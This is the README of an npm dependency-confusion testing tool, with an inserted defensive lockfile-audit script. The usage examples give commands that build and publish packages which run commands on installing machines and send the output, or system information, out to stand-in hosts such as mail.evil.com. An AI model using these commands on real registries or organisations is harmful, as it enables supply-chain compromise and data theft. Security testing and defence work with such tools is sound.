A3-N/ShouldaClaimed

ShouldaClaimed

A CLI tool for generating Dependency Confusion proof-of-concept (PoC) packages and publishing them to npm.

Install

go install github.com/A3-N/ShouldaClaimed@latest

Usage

1. Create Payload (No Publish)

Generate a package to inspect the code or publish manually later.

RCE with Exfiltration: Execute a command and send the output back via the selected protocol.

# Run 'whoami' and send output via SMTP
ShouldaClaimed create -t internal-utils -p smtp -s mail.evil.com:25 -r "whoami"

Standard Exfiltration (System & File Info):

# DNS (Chunked for reliability)
ShouldaClaimed create -t internal-utils -p dns -s your-collab.net

# HTTP
ShouldaClaimed create -t internal-utils -p http -s http://your-collab.net

2. Create & Publish

Generates the package, handles authentication, and publishes to the NPM registry in one go.

ShouldaClaimed publish -t internal-utils -p dns -s your-collab.net

Note: This command verifies that npm is installed and that the package doesn't already exist in the registry (to avoid a collision), and runs npm login if you are not authenticated.

Example Output

.▄▄ ·  ▄ .▄      ▄• ▄▌▄▄▌  ·▄▄▄▄   ▄▄▄· 
▐█ ▀. ██▪▐█▪     █▪██▌██•  ██▪ ██ ▐█ ▀█ 
▄▀▀▀█▄██▀▐█ ▄█▀▄ █▌▐█▌██▪  ▐█· ▐█▌▄█▀▀█ 
▐█▄▪▐███▌▐▀▐█▌.▐▌▐█▄█▌▐█▌▐▌██. ██ ▐█ ▪▐▌
 ▀▀▀▀ ▀▀▀ · ▀█▄▀▪ ▀▀▀ .▀▀▀ ▀▀▀▀▀•  ▀  ▀ 
 ▄▄· ▄▄▌   ▄▄▄· ▪  • ▌ ▄ ·. ▄▄▄ .·▄▄▄▄  
▐█ ▌▪██•  ▐█ ▀█ ██ ·██ ▐███▪▀▄.▀·██▪ ██ 
██ ▄▄██▪  ▄█▀▀█ ▐█·▐█ ▌▐▌▐█·▐▀▀▪▄▐█· ▐█▌
▐███▌▐█▌▐▌▐█ ▪▐▌▐█▌██ ██▌▐█▌▐█▄▄▌██. ██ 
·▀▀▀ .▀▀▀  ▀  ▀ ▀▀▀▀▀  █▪▀▀▀ ▀▀▀ ▀▀▀▀▀• 
			            github.com/A3-N
[INF] ShouldaClaimed CLI initialized
[INF] Ensuring NPM authentication...
[INF] Creating package structure in ./internal-utils
[SUC] Created payload: index.js
[SUC] Created package.json
[INF] Publishing package from ./internal-utils...
npm notice
npm notice 📦  internal-utils@1.0.0
npm notice === Tarball Details ===
npm notice name:          internal-utils
npm notice version:       1.0.0
npm notice filename:      internal-utils-1.0.0.tgz
npm notice package size:  1.2 kB
npm notice unpacked size: 2.5 kB
npm notice shasum:        ...
npm notice integrity:     ...
npm notice total files:   2
npm notice
+ internal-utils@1.0.0
[SUC] Package published successfully!

Flags

| Flag | Long | Description |
|------|------|-------------|
| -t | --target | Required. Target package name. |
| -p | --poc | Protocol: dns, http, smtp. |
| -s | --server | Exfiltration server URI (e.g., collab.net, http://...). |
| -r | --rce | Command to execute. If set, output is exfiltrated via -p. |
| -o | --out | Output directory (default: .). |
| -f | --force | Skip pre-flight checks (NPM installed? Registry collision?). |
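
From the defender's side, the registry-collision pre-flight check is the exposure itself: an internal name that is free on the public registry. The following added example (not part of this README or of the ShouldaClaimed code) audits a package-lock.json for internal names that were not resolved from the private registry; the host `npm.internal.example`, the `@acme` scope and the sample lockfile are constructed assumptions.

```javascript
// Added example (not ShouldaClaimed code). Audits an npm lockfile (v2/v3 "packages" map)
// for internal package names that did not come from the private registry.
const INTERNAL_HOST = "npm.internal.example";                        // assumption: private registry host
const INTERNAL_NAMES = new Set(["internal-utils", "@acme/billing"]); // assumption: names the org owns

// Constructed sample lockfile, embedded so the check runs offline.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { name: "app", version: "1.0.0" },
    "node_modules/internal-utils": {
      version: "1.0.0",
      resolved: "https://registry.npmjs.org/internal-utils/-/internal-utils-1.0.0.tgz",
      hasInstallScript: true,
    },
    "node_modules/@acme/billing": {
      version: "2.3.1",
      resolved: "https://npm.internal.example/@acme/billing/-/billing-2.3.1.tgz",
    },
    "node_modules/lodash": {
      version: "4.17.21",
      resolved: "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
    },
  },
};

// "node_modules/a/node_modules/@s/b" -> "@s/b"
function packageName(lockPath) {
  const marker = "node_modules/";
  const i = lockPath.lastIndexOf(marker);
  return i === -1 ? lockPath : lockPath.slice(i + marker.length);
}

function auditLock(lock, internalNames, internalHost) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    const name = packageName(path);
    // Skip the root project, workspace links, and anything that is not an internal name.
    if (path === "" || entry.link || !internalNames.has(name)) continue;
    let resolvedHost = null; // stays null when "resolved" is missing or not a URL
    try { resolvedHost = new URL(entry.resolved).host; } catch { /* leave null */ }
    const wrongSource = resolvedHost !== internalHost;
    const unscoped = !name.startsWith("@"); // unscoped names cannot be bound to a registry via @scope:registry
    if (wrongSource || unscoped) {
      findings.push({ name, version: entry.version, resolvedHost, wrongSource, unscoped,
                      installScript: Boolean(entry.hasInstallScript) });
    }
  }
  return findings;
}

console.log(JSON.stringify(auditLock(SAMPLE_LOCK, INTERNAL_NAMES, INTERNAL_HOST), null, 2));
```

A finding with `wrongSource: true` means the installed tarball should be treated as untrusted until its origin is confirmed; `unscoped: true` marks a name worth moving under an organization scope mapped to the private registry in `.npmrc`.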

Authorized use only

This project is intended for authorized security testing and research only.

You may use it only when you have explicit, written permission from the asset owner (or you are the owner). Misuse of this tool may violate laws, contracts, and acceptable-use policies. The authors and contributors assume no liability for misuse.
